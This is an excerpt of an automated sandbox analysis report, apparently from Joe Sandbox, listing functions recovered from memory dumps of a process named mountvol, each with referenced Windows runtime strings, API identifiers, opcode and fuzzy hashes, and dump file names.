                                                                                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                        • API String ID: 0-2474120054
                                                                                        • Opcode ID: 34102bf2cf626471bf14302f2ca07df7f2239e95eace4e94f63d691c22c569d5
                                                                                        • Instruction ID: 082d732546100539b9898944689705389d8fdc47ea273fcbdf16bfd495123ac4
                                                                                        • Opcode Fuzzy Hash: 34102bf2cf626471bf14302f2ca07df7f2239e95eace4e94f63d691c22c569d5
                                                                                        • Instruction Fuzzy Hash: FFE1AC34608741DFD724CF68C885B2AB7E0BB8D314F180A5DF9A58B2E1D7B4D986CB42
                                                                                        Function 0311BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        • RTL: Re-Waiting, xrefs: 03157BAC
                                                                                        • RTL: Resource at %p, xrefs: 03157B8E
                                                                                        • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 03157B7F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3913934846.00000000030B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030B0000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3913934846.00000000031D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3913934846.00000000031DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3913934846.000000000324E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_30b0000_mountvol.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                        • API String ID: 0-871070163
                                                                                        • Opcode ID: e80673c22431b47a5ee2b95e5fd3ef9291bc279da4ac667e50d19ac8fe4d76b5
                                                                                        • Instruction ID: 3c81e10bca4efab79153108d87da5fee92e5ab008b8477b8e1f77900e19763be
                                                                                        • Opcode Fuzzy Hash: e80673c22431b47a5ee2b95e5fd3ef9291bc279da4ac667e50d19ac8fe4d76b5
                                                                                        • Instruction Fuzzy Hash: 4041F3357097029FC724DF25C841BAAB7E5EF8D710F044A2DF85ADB680DB70E4658B91
                                                                                        Function 0311B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0315728C
                                                                                        Strings
                                                                                        • RTL: Re-Waiting, xrefs: 031572C1
                                                                                        • RTL: Resource at %p, xrefs: 031572A3
                                                                                        • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 03157294
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3913934846.00000000030B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030B0000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3913934846.00000000031D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3913934846.00000000031DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3913934846.000000000324E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_30b0000_mountvol.jbxd
                                                                                        Similarity
                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                        • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                        • API String ID: 885266447-605551621
                                                                                        • Opcode ID: 91b58d5d0e9e555359470d6173aecc5a6d374c4b272fadd39b421602738f1fb3
                                                                                        • Instruction ID: 06dcb622dcdafadaadd6c6f28b67d2ed9a75b89f29e65ef46b06a08ea062f0f4
                                                                                        • Opcode Fuzzy Hash: 91b58d5d0e9e555359470d6173aecc5a6d374c4b272fadd39b421602738f1fb3
                                                                                        • Instruction Fuzzy Hash: 2941D435604216AFC710DF65CC42BAAB7A5FF4C710F144629FC66EB680DB31E8568BD1
                                                                                        Function 03192300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3913934846.00000000030B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030B0000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3913934846.00000000031D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3913934846.00000000031DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3913934846.000000000324E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_30b0000_mountvol.jbxd
                                                                                        Similarity
                                                                                        • API ID: ___swprintf_l
                                                                                        • String ID: %%%u$]:%u
                                                                                        • API String ID: 48624451-3050659472
                                                                                        • Opcode ID: cd3395b220ecc025779d2c1758fb6a849fbfae7b58331f14324809e8cbdfa662
                                                                                        • Instruction ID: 1d3bc7e15852a2ce02e935edb8bf20f3935282ebd0daea94ef865cf81b5b3522
                                                                                        • Opcode Fuzzy Hash: cd3395b220ecc025779d2c1758fb6a849fbfae7b58331f14324809e8cbdfa662
                                                                                        • Instruction Fuzzy Hash: E9316876A0021DAFDF24DF29DC40BEEB7F8EF4C610F444556E849D7140EB30AA558BA0
                                                                                        Function 03127D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3913934846.00000000030B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030B0000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3913934846.00000000031D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3913934846.00000000031DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3913934846.000000000324E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_30b0000_mountvol.jbxd
                                                                                        Similarity
                                                                                        • API ID: __aulldvrm
                                                                                        • String ID: +$-
                                                                                        • API String ID: 1302938615-2137968064
                                                                                        • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                        • Instruction ID: 1ab65265cea6fcdaec934134f8fc36fb969b85b4bbc3662aa20cd45616a55d9c
                                                                                        • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                        • Instruction Fuzzy Hash: 6091B770E0423A9BDB24DE69C8916BFBFA5FF4C720F18451AE875E72C1E73099608761
                                                                                        Function 030E9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3913934846.00000000030B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030B0000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3913934846.00000000031D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3913934846.00000000031DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3913934846.000000000324E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_30b0000_mountvol.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: $$@
                                                                                        • API String ID: 0-1194432280
                                                                                        • Opcode ID: 9fe7b55698eef210911c6efc5bed538aaf9a10f0e471919c8e8b66f1607cda75
                                                                                        • Instruction ID: 509eba8a958be96e8c4cb9aa0bdd766cea4c3478caa9db012184bfec5c892895
                                                                                        • Opcode Fuzzy Hash: 9fe7b55698eef210911c6efc5bed538aaf9a10f0e471919c8e8b66f1607cda75
                                                                                        • Instruction Fuzzy Hash: 15814A75E012699FDB25DB54CC44BEEB7B8AF48750F0445EAE919B7280D7309E81CFA0
                                                                                        Function 0316CEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • @_EH4_CallFilterFunc@8.LIBCMT ref: 0316CFBD
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3913934846.00000000030B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030B0000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3913934846.00000000031D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3913934846.00000000031DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3913934846.000000000324E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_30b0000_mountvol.jbxd
                                                                                        Similarity
                                                                                        • API ID: CallFilterFunc@8
                                                                                        • String ID: @$@4Qw@4Qw
                                                                                        • API String ID: 4062629308-2383119779
                                                                                        • Opcode ID: ed1d5bdd2abd2b264520c19434ae5e43b2cf86837ed92e26d06a9f5e1911dc49
                                                                                        • Instruction ID: 02cdf80a556b3c6102d1908b97fd21c97ce79f34f854fa2db32667dc17d912e7
                                                                                        • Opcode Fuzzy Hash: ed1d5bdd2abd2b264520c19434ae5e43b2cf86837ed92e26d06a9f5e1911dc49
                                                                                        • Instruction Fuzzy Hash: A141CE79A01618DFCB25DFA9D940AAEFBB8EF8DB00F04446AE910DB254D774C851CBA1